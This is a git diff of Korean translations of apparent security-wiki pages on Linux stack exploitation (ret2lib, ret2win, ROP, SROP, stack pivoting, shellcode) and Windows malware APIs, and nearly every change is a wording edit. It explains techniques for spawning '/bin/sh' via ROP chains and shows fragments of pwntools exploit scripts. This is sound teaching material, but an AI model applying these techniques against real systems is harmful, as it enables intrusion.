+우리는 2개의 일치를 얻습니다(첫 번째가 작동하지 않으면 두 번째를 시도해야 합니다). 첫 번째 것을 다운로드하세요:
 ```bash
 ./download libc6_2.23-0ubuntu10_amd64
 Getting libc6_2.23-0ubuntu10_amd64
@@ -188,9 +188,9 @@ gets
 
 따라서 `template.py`의 시작 부분에서 **libc** 변수를 다음으로 변경합니다: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #알고 있을 때 라이브러리 경로 설정`
 
-**libc 라이브러리**에 **경로**를 제공하면 나머지 **익스플로잇은 자동으로 계산됩니다**.
+**libc 라이브러리**에 **경로**를 제공하면 나머지 **익스플로잇이 자동으로 계산됩니다**.
 
-`get_addr` 함수 내에서 **libc의 기본 주소**가 계산될 것입니다:
+`get_addr` 함수 내에서 **libc의 기본 주소**가 계산됩니다:
 ```python
 if libc != "":
 libc.address = leak - libc.symbols[func_name] #Save libc base
@@ -258,13 +258,13 @@ Disassembly of section .text:
 ```python
 MAIN_PLT = 0x401080
 ```
-### Puts를 찾을 수 없음
+### Puts not found
 
 바이너리가 Puts를 사용하지 않는 경우 다음을 확인해야 합니다.
 
-### `sh: 1: %s%s%s%s%s%s%s%s: 찾을 수 없음`
+### `sh: 1: %s%s%s%s%s%s%s%s: not found`
 
-모든 익스플로잇을 생성한 후 이 **오류**를 발견하면: `sh: 1: %s%s%s%s%s%s%s%s: 찾을 수 없음`
+모든 익스플로잇을 생성한 후 이 **오류**를 발견하면: `sh: 1: %s%s%s%s%s%s%s%s: not found`
 
 **"/bin/sh"의 주소에서 64 바이트를 빼보세요**:
 ```python
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
index 523adb219..dc6442cbf 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -196,13 +196,13 @@ Disassembly of section .text:
 ```python
 MAIN_PLT = 0x401080
 ```
-## Puts를 찾을 수 없음
+## Puts not found
 
-바이너리가 Puts를 사용하지 않는 경우 다음을 확인해야 합니다.
+이진 파일이 Puts를 사용하지 않는 경우 사용하고 있는지 확인해야 합니다.
 
-## `sh: 1: %s%s%s%s%s%s%s%s: 찾을 수 없음`
+## `sh: 1: %s%s%s%s%s%s%s%s: not found`
 
-모든 익스플로잇을 생성한 후 이 **오류**를 발견하면: `sh: 1: %s%s%s%s%s%s%s%s: 찾을 수 없음`
+모든 익스플로잇을 생성한 후 이 **오류**를 발견하면: `sh: 1: %s%s%s%s%s%s%s%s: not found`
 
 **"/bin/sh"의 주소에서 64 바이트를 빼보세요**:
 ```python
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md
index cf3c5cfd5..5763b9e27 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md
@@ -22,7 +22,7 @@
 ## Ret2pop
 
 수정하고 싶지 않은 **완벽한 포인터를 스택에서 찾을 수 있는 경우** (ret2ret에서는 최종 최하위 바이트를 `0x00`으로 변경합니다), 동일한 `ret2ret` 공격을 수행할 수 있지만, **RET 슬레드의 길이는 1만큼 줄여야 합니다** (그래서 최종 `0x00`이 완벽한 포인터 바로 앞의 데이터를 덮어씁니다), 그리고 **RET 슬레드의 마지막** 주소는 **`pop <reg>; ret`**를 가리켜야 합니다.\
-이렇게 하면 **완벽한 포인터 앞의 데이터가** 스택에서 제거됩니다 (이 데이터는 `0x00`의 영향을 받습니다) 그리고 **최종 `ret`는 스택의 완벽한 주소를 가리키게 됩니다**.
+이렇게 하면 **완벽한 포인터 앞의 데이터가 스택에서 제거됩니다** (이 데이터는 `0x00`의 영향을 받습니다) 그리고 **최종 `ret`는 스택의 완벽한 주소를 가리키게 됩니다**.
 
 [**이 링크**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2pop.c)를 따라가면 취약한 바이너리의 예를 볼 수 있고, [**이 링크**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2popexploit.c)에서는 익스플로잇을 볼 수 있습니다.
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
index 0955814db..aebf44ad3 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
@@ -4,7 +4,7 @@
 
 ## Basic Information
 
-**Ret2win** 챌린지는 **Capture The Flag (CTF)** 대회에서 인기 있는 카테고리로, 특히 **바이너리 익스플로잇**과 관련된 작업에서 그렇습니다. 목표는 주어진 바이너리의 취약점을 이용하여 바이너리 내에서 특정 호출되지 않은 함수를 실행하는 것입니다. 이 함수는 보통 `win`, `flag`와 같은 이름을 가지고 있습니다. 이 함수가 실행되면 일반적으로 플래그나 성공 메시지를 출력합니다. 이 챌린지는 일반적으로 스택에서 **리턴 주소**를 덮어써서 실행 흐름을 원하는 함수로 전환하는 것을 포함합니다. 다음은 예제를 포함한 더 자세한 설명입니다:
+**Ret2win** 챌린지는 **Capture The Flag (CTF)** 대회에서 인기 있는 카테고리로, 특히 **바이너리 익스플로잇**과 관련된 작업에서 그렇습니다. 목표는 주어진 바이너리의 취약점을 이용하여 바이너리 내에서 특정 호출되지 않은 함수를 실행하는 것입니다. 이 함수는 보통 `win`, `flag` 등과 같은 이름을 가지고 있습니다. 이 함수가 실행되면 일반적으로 플래그나 성공 메시지를 출력합니다. 이 챌린지는 일반적으로 스택에서 **리턴 주소**를 덮어써서 실행 흐름을 원하는 함수로 전환하는 것을 포함합니다. 다음은 예제를 포함한 더 자세한 설명입니다:
 
 ### C Example
 
@@ -31,15 +31,15 @@ return 0;
 ```sh
 gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
 ```
-- `-m32`: 프로그램을 32비트 바이너리로 컴파일합니다(선택 사항이지만 CTF 챌린지에서 일반적입니다).
+- `-m32`: 프로그램을 32비트 바이너리로 컴파일합니다 (선택 사항이지만 CTF 챌린지에서 일반적입니다).
 - `-fno-stack-protector`: 스택 오버플로우에 대한 보호를 비활성화합니다.
 - `-z execstack`: 스택에서 코드 실행을 허용합니다.
-- `-no-pie`: 위치 독립 실행 파일을 비활성화하여 `win` 함수의 주소가 변경되지 않도록 합니다.
+- `-no-pie`: `win` 함수의 주소가 변경되지 않도록 Position Independent Executable을 비활성화합니다.
 - `-o vulnerable`: 출력 파일 이름을 `vulnerable`로 설정합니다.
 
 ### Pwntools를 이용한 Python Exploit
 
-익스플로잇을 위해 **pwntools**를 사용할 것입니다. 이는 익스플로잇 작성을 위한 강력한 CTF 프레임워크입니다. 익스플로잇 스크립트는 버퍼를 오버플로우하고 반환 주소를 `win` 함수의 주소로 덮어쓰는 페이로드를 생성합니다.
+익스플로잇을 위해 **pwntools**를 사용할 것입니다. 이는 익스플로잇 작성을 위한 강력한 CTF 프레임워크입니다. 익스플로잇 스크립트는 버퍼를 오버플로우하고 `win` 함수의 주소로 반환 주소를 덮어쓰는 페이로드를 생성할 것입니다.
 ```python
 from pwn import *
 
@@ -82,7 +82,7 @@ Python 스크립트는 정교하게 제작된 메시지를 전송하여, `vulner
 - [https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html)
 - 64비트, ASLR 없음
 - [https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html)
-- 32비트, ASLR 없음, 두 번의 작은 오버플로우, 첫 번째로 스택을 오버플로우하고 두 번째 오버플로우의 크기를 늘림
+- 32비트, ASLR 없음, 이중 소규모 오버플로우, 스택을 먼저 오버플로우하고 두 번째 오버플로우의 크기를 늘림
 - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html)
 - 32비트, relro, 카나리 없음, nx, pie 없음, `fflush` 주소를 `win` 함수로 덮어쓰는 포맷 문자열 (ret2win)
 - [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/)
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
index 3ed99bb3d..176125a58 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
@@ -83,16 +83,16 @@ p.interactive()
 
 #### **가젯 찾기**
 
-우리의 목적을 위해, **RDI** 레지스터를 설정할 수 있는 가젯에 집중하겠습니다 (인자로 **"/bin/sh"** 문자열을 **system()**에 전달하기 위해) 그리고 그 다음 **system()** 함수를 호출합니다. 우리는 다음 가젯을 식별했다고 가정하겠습니다:
+우리의 목적을 위해, **RDI** 레지스터를 설정할 수 있는 가젯에 집중하겠습니다 (인자로 **system()**에 **"/bin/sh"** 문자열을 전달하기 위해) 그리고 **system()** 함수를 호출하겠습니다. 다음 가젯을 식별했다고 가정하겠습니다:
 
-- **pop rdi; ret**: 스택의 최상위 값을 **RDI**에 팝하고 그 다음 반환합니다. **system()**의 인자를 설정하는 데 필수적입니다.
+- **pop rdi; ret**: 스택의 최상위 값을 **RDI**에 팝하고 반환합니다. **system()**의 인자를 설정하는 데 필수적입니다.
 - **ret**: 간단한 반환으로, 일부 시나리오에서 스택 정렬에 유용합니다.
 
 그리고 우리는 **system()** 함수의 주소를 알고 있습니다.
 
 ### **ROP 체인**
 
-아래는 **pwntools**를 사용하여 **system('/bin/sh')**를 실행하기 위한 ROP 체인을 설정하고 실행하는 예제입니다:
+아래는 **pwntools**를 사용하여 **system('/bin/sh')**를 실행하는 ROP 체인을 설정하고 실행하는 예제입니다:
 ```python
 from pwn import *
 
@@ -135,33 +135,33 @@ p.interactive()
 
 ### 스택 정렬
 
-**x86-64 ABI**는 **call instruction**이 실행될 때 **스택이 16바이트 정렬**되도록 보장합니다. **LIBC**는 성능 최적화를 위해 **SSE instructions**(예: **movaps**)를 사용하며, 이 정렬이 필요합니다. 스택이 제대로 정렬되지 않으면(**RSP**가 16의 배수가 아닐 경우) **system**과 같은 함수 호출이 **ROP chain**에서 실패합니다. 이를 해결하려면 ROP 체인에서 **system**을 호출하기 전에 **ret gadget**을 추가하면 됩니다.
+**x86-64 ABI**는 **call instruction**이 실행될 때 **스택이 16바이트 정렬**되어 있음을 보장합니다. **LIBC**는 성능 최적화를 위해 **SSE instructions**(예: **movaps**)를 사용하며, 이 정렬이 필요합니다. 스택이 제대로 정렬되지 않으면(**RSP**가 16의 배수가 아닐 경우) **system**과 같은 함수 호출이 **ROP chain**에서 실패합니다. 이를 해결하기 위해, ROP 체인에서 **system**을 호출하기 전에 간단히 **ret gadget**을 추가하면 됩니다.
 
 ## x86과 x64의 주요 차이점
 
 > [!TIP]
-> x64는 처음 몇 개의 인수에 레지스터를 사용하므로 간단한 함수 호출에 대해 x86보다 더 적은 가젯을 필요로 하지만, 레지스터 수가 증가하고 주소 공간이 커짐에 따라 올바른 가젯을 찾고 연결하는 것이 더 복잡할 수 있습니다. **x64** 아키텍처의 레지스터 수 증가와 더 큰 주소 공간은 특히 Return-Oriented Programming (ROP) 맥락에서 익스플로잇 개발에 기회와 도전을 모두 제공합니다.
+> x64는 처음 몇 개의 인수에 레지스터를 사용하므로, 간단한 함수 호출을 위해 x86보다 더 적은 가젯을 필요로 하는 경우가 많지만, 레지스터 수가 증가하고 주소 공간이 커짐에 따라 올바른 가젯을 찾고 연결하는 것이 더 복잡할 수 있습니다. **x64** 아키텍처의 증가된 레지스터 수와 더 큰 주소 공간은 특히 Return-Oriented Programming (ROP) 맥락에서 익스플로잇 개발에 기회와 도전을 제공합니다.
 
 ## 보호 조치
 
 - [**ASLR**](../common-binary-protections-and-bypasses/aslr/)
 - [**스택 카나리**](../common-binary-protections-and-bypasses/stack-canaries/)
 
-## 기타 예제 및 참고자료
+## 기타 예제 및 참조
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions)
 
 ## ROP 기반 기술
 
-ROP는 임의의 코드를 실행하기 위한 기술일 뿐입니다. ROP를 기반으로 많은 Ret2XXX 기술이 개발되었습니다:
+ROP는 임의의 코드를 실행하기 위한 기술일 뿐임을 유의하십시오. ROP를 기반으로 많은 Ret2XXX 기술이 개발되었습니다:
 
-- **Ret2lib**: ROP를 사용하여 로드된 라이브러리에서 임의의 매개변수로 임의의 함수를 호출합니다(보통 `system('/bin/sh')`와 같은 형태).
+- **Ret2lib**: ROP를 사용하여 임의의 매개변수로 로드된 라이브러리에서 임의의 함수를 호출합니다(보통 `system('/bin/sh')`와 같은 형태).
 
 {{#ref}}
 ret2lib/
 {{#endref}}
 
-- **Ret2Syscall**: ROP를 사용하여 시스템 호출을 준비하고, 예를 들어 `execve`를 호출하여 임의의 명령을 실행합니다.
+- **Ret2Syscall**: ROP를 사용하여 시스템 호출을 준비하고, 예를 들어 `execve`를 통해 임의의 명령을 실행합니다.
 
 {{#ref}}
 rop-syscall-execv.md
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
index 3a9cd7141..1e7cec4ae 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
@@ -4,7 +4,7 @@
 
 ## 기본 정보
 
-이것은 Ret2lib와 유사하지만, 이 경우에는 라이브러리에서 함수를 호출하지 않습니다. 이 경우, 모든 것이 `/bin/sh`를 실행하기 위해 `sys_execve` 시스템 호출을 호출하도록 준비됩니다. 이 기술은 일반적으로 정적으로 컴파일된 바이너리에서 수행되므로, 많은 가젯과 시스템 호출 명령어가 있을 수 있습니다.
+이것은 Ret2lib와 유사하지만, 이 경우에는 라이브러리의 함수를 호출하지 않습니다. 이 경우, 모든 것이 `/bin/sh`를 실행하기 위해 `sys_execve` 시스템 호출을 호출하도록 준비됩니다. 이 기술은 일반적으로 정적으로 컴파일된 바이너리에서 수행되므로, 많은 가젯과 시스템 호출 명령어가 있을 수 있습니다.
 
 **syscall** 호출을 준비하기 위해서는 다음과 같은 구성이 필요합니다:
 
@@ -13,7 +13,7 @@
 - `rsi: 0, 전달된 인수 없음 지정`
 - `rdx: 0, 전달된 환경 변수 없음 지정`
 
-따라서 기본적으로 문자열 `/bin/sh`를 어딘가에 작성한 다음 `syscall`을 수행해야 합니다(스택을 제어하기 위해 필요한 패딩을 인식해야 함). 이를 위해, 알려진 영역에 `/bin/sh`를 작성할 가젯이 필요합니다.
+따라서 기본적으로 `/bin/sh` 문자열을 어딘가에 작성한 다음 `syscall`을 수행해야 합니다(스택을 제어하기 위해 필요한 패딩을 인식해야 함). 이를 위해, 알려진 영역에 `/bin/sh`를 작성할 가젯이 필요합니다.
 
 > [!TIP]
 > 호출할 또 다른 흥미로운 시스템 호출은 **`mprotect`**로, 이는 공격자가 **메모리의 페이지 권한을 수정할 수 있게 해줍니다**. 이는 [ret2shellcode](stack-shellcode.md)와 결합될 수 있습니다.
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
index f3bcee746..66b40b75d 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
@@ -11,7 +11,7 @@
 흥미로운 점은 **`sigreturn`**이 프로그램의 상태를 복원하는 방법입니다: 이는 **모든 CPU의 레지스터 값을 스택에 저장**함으로써 이루어집니다. 신호가 더 이상 차단되지 않으면, **`sigreturn`은 이 값을 스택에서 팝**하여 CPU의 레지스터를 신호가 처리되기 전의 상태로 효과적으로 재설정합니다. 여기에는 현재 스택의 맨 위를 가리키는 스택 포인터 레지스터(RSP)가 포함됩니다.
 
 > [!CAUTION]
-> ROP 체인에서 **`sigreturn`** syscall을 호출하고 **스택에 로드할 레지스터 값**을 추가하면 모든 레지스터 값을 **제어**할 수 있으며, 따라서 예를 들어 syscall `execve`를 `/bin/sh`로 호출할 수 있습니다.
+> ROP 체인에서 **`sigreturn`** syscall을 호출하고 **로드하고 싶은 레지스터 값**을 **스택**에 추가하면 모든 레지스터 값을 **제어**할 수 있으며, 따라서 예를 들어 `execve` syscall을 `/bin/sh`로 호출할 수 있습니다.
 
 이것이 다른 Ret2syscall을 호출하기 위한 매개변수를 제어하는 데 훨씬 더 쉽게 만드는 **Ret2syscall의 일종**이라는 점에 유의하십시오:
 
@@ -19,7 +19,7 @@
 rop-syscall-execv.md
 {{#endref}}
 
-더 나은 설명을 원하시면 다음도 확인하세요:
+더 나은 설명을 위해 다음도 확인하십시오:
 
 {% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
index 2ff5cb200..47a1ac686 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
@@ -4,7 +4,7 @@
 
 ## 기본 정보
 
-이 기술은 **기본 포인터(EBP)**를 조작하여 EBP 레지스터와 `leave; ret` 명령어 시퀀스를 신중하게 사용하여 여러 함수의 실행을 체인하는 능력을 이용합니다.
+이 기술은 **기본 포인터(EBP)**를 조작하여 EBP 레지스터와 `leave; ret` 명령어 시퀀스를 신중하게 사용하여 여러 함수의 실행을 연결하는 능력을 이용합니다.
 
 상기 사항으로, **`leave`**는 기본적으로 다음을 의미합니다:
 ```
@@ -25,7 +25,7 @@ ret
 
 먼저 **임의의 데이터/주소를 쓸 수 있는 주소**를 알아야 합니다. ESP는 여기로 가리키고 **첫 번째 `ret`을 실행합니다.**
 
-그 다음, **임의의 코드를 실행할 `ret`이 사용하는 주소**를 알아야 합니다. 다음을 사용할 수 있습니다:
+그 다음, **임의의 코드를 실행할** `ret`이 사용하는 주소를 알아야 합니다. 다음을 사용할 수 있습니다:
 
 - 유효한 [**ONE_GADGET**](https://github.com/david942j/one_gadget) 주소.
 - **`system()`**의 주소 뒤에 **4개의 쓰레기 바이트**와 `"/bin/sh"`의 주소(x86 비트).
@@ -51,7 +51,7 @@ ret
 
 기본적으로 이 방법으로 여러 개의 가짜 EBP를 연결하여 프로그램의 흐름을 제어할 수 있습니다.
 
-이것은 [ret2lib](ret2lib/)와 비슷하지만, 명백한 이점 없이 더 복잡합니다. 그러나 일부 엣지 케이스에서는 흥미로울 수 있습니다.
+이것은 [ret2lib](ret2lib/)와 비슷하지만, 명백한 이점은 없지만 일부 엣지 케이스에서 흥미로울 수 있습니다.
 
 게다가, 여기에는 **스택 누수**를 사용하여 승리하는 함수를 호출하는 [**챌린지의 예**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave)가 있습니다. 이것은 페이지의 최종 페이로드입니다:
 ```python
@@ -116,11 +116,11 @@ add    $0x10c,%esp  # reduce stack size
 pop    %ebx         # restore ebx
 ret                 # return
 ```
-## RSP 제어의 다른 방법
+## RSP를 제어하는 다른 방법
 
 ### **`pop rsp`** 가젯
 
-[**이 페이지에서**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp) 이 기술을 사용하는 예제를 찾을 수 있습니다. 이 도전 과제에서는 2개의 특정 인수를 가진 함수를 호출해야 했으며, **`pop rsp` 가젯**이 있었고 **스택에서의 누출**이 있었습니다:
+[**이 페이지에서**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp) 이 기술을 사용하는 예제를 찾을 수 있습니다. 이 도전 과제를 위해서는 2개의 특정 인수를 가진 함수를 호출해야 했으며, **`pop rsp` 가젯**이 있었고 **스택에서의 leak**이 있었습니다:
 ```python
 # Code from https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp
 # This version has added comments
@@ -164,13 +164,13 @@ pause()
 p.sendline(payload)
 print(p.recvline())
 ```
-### xchg \<reg>, rsp 가젯
+### xchg \<reg>, rsp gadget
 ```
 pop <reg>                <=== return pointer
 <reg value>
 xchg <reg>, rsp
 ```
-## 참고문헌
+## 참고 문헌
 
 - [https://bananamafia.dev/post/binary-rop-stackpivot/](https://bananamafia.dev/post/binary-rop-stackpivot/)
 - [https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting)
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
index 9d0e2d507..dcd75d2ad 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
@@ -35,11 +35,11 @@ gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
 - `-fno-stack-protector`: 스택 보호를 비활성화합니다.
 - `-z execstack`: 스택을 실행 가능하게 만들어, 스택에 저장된 shellcode를 실행하는 데 필요합니다.
 - `-no-pie`: 위치 독립 실행 파일을 비활성화하여, 우리의 shellcode가 위치할 메모리 주소를 예측하기 쉽게 만듭니다.
-- `-m32`: 프로그램을 32비트 실행 파일로 컴파일하여, 익스플로잇 개발의 단순성을 위해 자주 사용됩니다.
+- `-m32`: 프로그램을 32비트 실행 파일로 컴파일하여, 익스플로잇 개발에서 단순함을 위해 자주 사용됩니다.
 
 ### Python Exploit using Pwntools
 
-다음은 **pwntools**를 사용하여 **ret2shellcode** 공격을 수행하는 Python 익스플로잇을 작성하는 방법입니다:
+다음은 **pwntools**를 사용하여 **ret2shellcode** 공격을 수행하는 익스플로잇을 Python으로 작성하는 방법입니다:
 ```python
 from pwn import *
 
@@ -68,13 +68,13 @@ p.interactive()
 ```
 이 스크립트는 **NOP 슬라이드**, **쉘코드**로 구성된 페이로드를 생성한 다음, **EIP**를 NOP 슬라이드를 가리키는 주소로 덮어써서 쉘코드가 실행되도록 합니다.
 
-**NOP 슬라이드** (`asm('nop')`)는 정확한 주소에 관계없이 실행이 우리의 쉘코드로 "미끄러질" 가능성을 높이기 위해 사용됩니다. `p32()` 인수를 버퍼의 시작 주소에 오프셋을 더한 값으로 조정하여 NOP 슬라이드에 도달하도록 합니다.
+**NOP 슬라이드**(`asm('nop')`)는 실행이 정확한 주소에 관계없이 쉘코드로 "슬라이드"될 가능성을 높이기 위해 사용됩니다. `p32()` 인수를 버퍼의 시작 주소에 오프셋을 더한 값으로 조정하여 NOP 슬라이드에 도달하도록 합니다.
 
 ## 보호 조치
 
 - [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **은 비활성화되어야** 주소가 실행 간에 신뢰할 수 있도록 하거나 함수가 저장될 주소가 항상 동일하지 않으며, win 함수가 로드된 위치를 파악하기 위해 어떤 누출이 필요합니다.
-- [**스택 카나리**](../common-binary-protections-and-bypasses/stack-canaries/)도 비활성화되어야 하며, 그렇지 않으면 손상된 EIP 반환 주소가 결코 따라지지 않을 것입니다.
-- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) **스택** 보호는 스택 내에서 쉘코드의 실행을 방지합니다. 해당 영역은 실행 가능하지 않기 때문입니다.
+- [**스택 카나리**](../common-binary-protections-and-bypasses/stack-canaries/)도 비활성화되어야 하며, 그렇지 않으면 손상된 EIP 반환 주소가 결코 따라가지 않을 것입니다.
+- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) **스택** 보호는 해당 영역이 실행 가능하지 않기 때문에 스택 내에서 쉘코드의 실행을 방지합니다.
 
 ## 기타 예제 및 참고 자료
 
diff --git a/src/reversing/common-api-used-in-malware.md b/src/reversing/common-api-used-in-malware.md
index 5214a6ca9..3df081637 100644
--- a/src/reversing/common-api-used-in-malware.md
+++ b/src/reversing/common-api-used-in-malware.md
@@ -38,7 +38,7 @@
 | CryptDecrypt()        |
 | CryptReleaseContext() |
 
-### 안티 분석/VM
+### 안티 분석/가상 머신
 
 | 함수 이름                                             | 어셈블리 명령어 |
 | --------------------------------------------------------- | --------------------- |
@@ -46,19 +46,19 @@
 | GetSystemInfo()                                           | IN()                  |
 | GlobalMemoryStatusEx()                                    |                       |
 | GetVersion()                                              |                       |
-| CreateToolhelp32Snapshot \[프로세스가 실행 중인지 확인] |                       |
-| CreateFileW/A \[파일 존재 여부 확인]                    |                       |
+| CreateToolhelp32Snapshot \[프로세스가 실행 중인지 확인\] |                       |
+| CreateFileW/A \[파일 존재 여부 확인\]                    |                       |
 
 ### 스텔스
 
 | 이름                     |                                                                            |
 | ------------------------ | -------------------------------------------------------------------------- |
-| VirtualAlloc             | 메모리 할당 (패커)                                                       |
-| VirtualProtect           | 메모리 권한 변경 (패커가 섹션에 실행 권한 부여)                          |
-| ReadProcessMemory        | 외부 프로세스에 주입                                                      |
-| WriteProcessMemoryA/W    | 외부 프로세스에 주입                                                      |
+| VirtualAlloc             | 메모리 할당 (패커)                                                     |
+| VirtualProtect           | 메모리 권한 변경 (패커가 섹션에 실행 권한 부여) |
+| ReadProcessMemory        | 외부 프로세스에 주입                                          |
+| WriteProcessMemoryA/W    | 외부 프로세스에 주입                                          |
 | NtWriteVirtualMemory     |                                                                            |
-| CreateRemoteThread       | DLL/프로세스 주입...                                                     |
+| CreateRemoteThread       | DLL/프로세스 주입...                                                   |
 | NtUnmapViewOfSection     |                                                                            |
 | QueueUserAPC             |                                                                            |
 | CreateProcessInternalA/W |                                                                            |
@@ -86,7 +86,7 @@
 - InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- 인터넷 접근
 - FindResource(), LoadResource(), LockResource() -- 실행 파일의 리소스 접근
 
-## 악성코드 기술
+## 악성코드 기법
 
 ### DLL 주입
 
@@ -102,7 +102,7 @@
 ### 반사 DLL 주입
 
 정상 Windows API 호출 없이 악성 DLL 로드.\
-DLL은 프로세스 내에 매핑되며, 가져오기 주소를 해결하고, 재배치 수정 및 DllMain 함수를 호출합니다.
+DLL은 프로세스 내에 매핑되며, 가져오기 주소를 해결하고, 재배치를 수정하고, DllMain 함수를 호출합니다.
 
 ### 스레드 하이재킹
 
diff --git a/src/reversing/cryptographic-algorithms/README.md b/src/reversing/cryptographic-algorithms/README.md
index 017a722d3..2505fbedd 100644
--- a/src/reversing/cryptographic-algorithms/README.md
+++ b/src/reversing/cryptographic-algorithms/README.md
@@ -37,7 +37,7 @@
 
 ### 코드 상수
 
-때때로 알고리즘을 식별하는 것이 특별하고 고유한 값을 사용해야 하기 때문에 매우 쉽습니다.
+때때로 알고리즘을 식별하는 것이 특별하고 고유한 값을 사용해야 하기 때문에 정말 쉽습니다.
 
 ![](<../../images/image (370).png>)
 
@@ -63,9 +63,9 @@
 
 3개의 주요 부분으로 구성됩니다:
 
-- **초기화 단계/**: **0x00에서 0xFF까지의 값 테이블**을 생성합니다(총 256바이트, 0x100). 이 테이블은 일반적으로 **치환 상자**(또는 SBox)라고 불립니다.
-- **섞기 단계**: 이전에 생성된 테이블을 **반복**하며(0x100 반복) 각 값을 **반무작위** 바이트로 수정합니다. 이 반무작위 바이트를 생성하기 위해 RC4 **키가 사용됩니다**. RC4 **키**는 **1바이트에서 256바이트** 사이일 수 있지만, 일반적으로 5바이트 이상이 권장됩니다. 일반적으로 RC4 키는 16바이트입니다.
-- **XOR 단계**: 마지막으로 평문 또는 암호문이 **이전에 생성된 값과 XOR됩니다**. 암호화 및 복호화 함수는 동일합니다. 이를 위해 **생성된 256바이트를 필요에 따라 반복**합니다. 이는 일반적으로 디컴파일된 코드에서 **%256 (mod 256)**으로 인식됩니다.
+- **초기화 단계/**: **0x00에서 0xFF까지의 값 테이블**을 생성합니다 (총 256바이트, 0x100). 이 테이블은 일반적으로 **치환 상자**(또는 SBox)라고 불립니다.
